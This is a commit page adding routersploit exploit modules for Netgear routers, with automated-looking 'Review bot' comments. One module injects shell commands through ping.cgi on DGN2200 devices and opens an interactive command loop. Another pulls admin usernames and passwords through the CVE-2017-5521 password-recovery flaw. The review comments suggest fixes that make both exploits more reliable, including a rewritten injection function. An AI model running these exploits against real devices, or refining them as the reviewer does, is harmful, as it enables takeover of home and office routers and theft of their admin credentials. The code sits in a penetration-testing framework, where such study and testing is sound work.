Commit 8c6cb8c7 by Joshua Abraham

Added NETGEAR DGN2200 RCE module

parent f897102f
import requests
from routersploit import (
exploits,
print_error,
print_success,
print_status,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploits Netgear DGN2200 RCE vulnerability in ping.cgi
"""
__info__ = {
'name': 'Netgear DGN2200 RCE',
'description': 'Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script',
'authors': [
'SivertPL', # vulnerability discovery
'Josh Abraham', # routesploit module
],
'references': [
'https://www.exploit-db.com/exploits/41394/',
],
'devices': [
'Netgear DGN2200v1',
'Netgear DGN2200v2',
'Netgear DGN2200v3',
'Netgear DGN2200v4',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
login = exploits.Option('admin', 'Username')
password = exploits.Option('password', 'Password')
def run(self):
"""
Method run on "exploit" or "run" command (both works the same way). It should result in exploiting target.
"""
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def command_loop(self):
while True:
command = raw_input("cmd > ")
if command in ['exit', 'quit']:
return
r = self.execute(command)
for l in r:
print l.encode('utf-8')
def execute(self, command):
r = requests.post(self.target + "/ping.cgi",
data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command},
auth=(self.login, self.password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
result = self.parse_output(r.text)
return result
def parse_output(self, text):
yet = False
result = []
for line in text.splitlines():
if line.startswith("<textarea"):
yet = True
continue
if yet:
if line.startswith("</textarea>"):
break
result.append(line)
return result
@mute
def check(self):
"""
Method that verifies if the target is vulnerable. It should not write anything on stdout and stderr.
"""
r = self.execute("echo test123")
return any("test123" in s for s in r)
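Review bot: `execute()` calls `requests.post` with no `timeout` and no exception handling, so an unreachable or slow target makes `check()` raise (or hang indefinitely) instead of returning False; the sibling Netgear module on this page goes through routersploit's `http_request` wrapper, which would be the consistent choice if it passes `auth`/`headers` through to requests. The `referer` header is hard-coded to `http://192.168.0.1/DIAG_diag.htm`, which will not match a target set via the `target` option on any other address — deriving it from `self.target` keeps any referer check on the device satisfied. The `echo test123` probe in `check()` can also false-positive if the page reflects the submitted `ping_IPAddr` value inside the textarea; whether this firmware does cannot be confirmed from the hunk, but a probe whose output differs from its input (e.g. `echo $((400+723))` matched against `1123`) would be unambiguous.
```python
def execute(self, command):
    """POST the injected ping form and return the textarea lines (empty on transport failure)."""
    payload = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12,
               'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command}
    try:
        r = requests.post(self.target + "/ping.cgi", data=payload,
                          auth=(self.login, self.password),
                          headers={'referer': self.target + "/DIAG_diag.htm"},
                          timeout=10)
    except requests.RequestException:
        return []  # check() sees an empty result and reports "not vulnerable"
    return self.parse_output(r.text)
```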
from routersploit import (
exploits,
print_success,
print_error,
print_status,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for multiple NETGEAR routers password disclosure vulnerability.
If the target is vulnerable, it allows read credentials for administration user.
"""
__info__ = {
'name': 'Netgear Multiple Vulnerabilities',
'description': 'Remote and Local Password Disclosure.',
'authors': [
'Simon Kenin of Trustwave SpiderLabs', # vulnerability discovery
'0BuRner', # routersploit module
],
'references': [
'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911',
'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/',
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5521',
'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5521',
'http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability'
],
'devices': [
'R8500',
'R8300',
'R7000',
'R6400',
'R7300DST',
'R7100LG',
'R6300v2',
'WNDR3400v3',
'WNR3500Lv2',
'R6250',
'R6700',
'R6900',
'R8000',
'R7900',
'WNDR4500v2',
'R6200v2',
'WNDR3400v2',
'D6220',
'D6400',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target is vulnerable")
url = "{}:{}".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None:
model = response.headers.get('WWW-Authenticate')[13:-1]
print_status("Detected Netgear model: {}".format(model))
token = self.extract_token(response.text)
if token is False:
token = "routersploit"
else:
print_status("Token found: {}".format(token))
url = "{}:{}/passwordrecovered.cgi?id={}".format(self.target, self.port, token)
response = http_request(method="POST", url=url)
if response.text.find('left\">') != -1:
username, password = self.extract_password(response.text)
print_success('Exploit success! login: {}, password: {}'.format(username, password))
else:
print_error("Exploit failed. Could not extract credentials.")
else:
print_error("Exploit failed. Could not extract credentials.")
else:
print_error("Target is not vulnerable")
@staticmethod
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return False
@staticmethod
def extract_token(html):
return Exploit.scrape(html, 'unauth.cgi?id=', '\"')
@staticmethod
def extract_password(html):
username = (repr(Exploit.scrape(html, 'Router Admin Username</td>', '</td>')))
username = Exploit.scrape(username, '>', '\'')
password = (repr(Exploit.scrape(html, 'Router Admin Password</td>', '</td>')))
password = Exploit.scrape(password, '>', '\'')
if username is False:
username = (Exploit.scrape(html[html.find('left\">'):-1], 'left\">', '</td>'))
password = (Exploit.scrape(html[html.rfind('left\">'):-1], 'left\">', '</td>'))
password = password.replace("&#35;", "#").replace("&#38;", "&")
return username, password
@mute
def check(self):
url = "{}:{}".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None:
header = response.headers.get('WWW-Authenticate')
if header is not None and 'NETGEAR' in header.upper():
return True # target is vulnerable
return False # target is not vulnerable
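Review bot: In `run()`, the response from the `http_request(method="POST", url=url)` call to `passwordrecovered.cgi` is never checked for `None` before `response.text.find(...)`, even though the GET two lines earlier is, so a failed request there raises `AttributeError` instead of printing the "Exploit failed" message; `if response is not None and response.text.find('left\">') != -1:` closes that. `model = response.headers.get('WWW-Authenticate')[13:-1]` likewise assumes a fixed `Basic realm="NETGEAR …"` layout and will mis-slice, or raise on a missing header, for anything else — a guard on `header is None` and a regex for the realm would be safer. `extract_password` has the same shape of problem: when the `Router Admin Password</td>` marker is missing but the username marker is present, `password` is `False` and `.replace` raises. Note also that `check()` only fingerprints the realm string, so "Target is vulnerable" really means "looks like a Netgear device"; fully patched models still carry that realm, so the status message overstates what was verified.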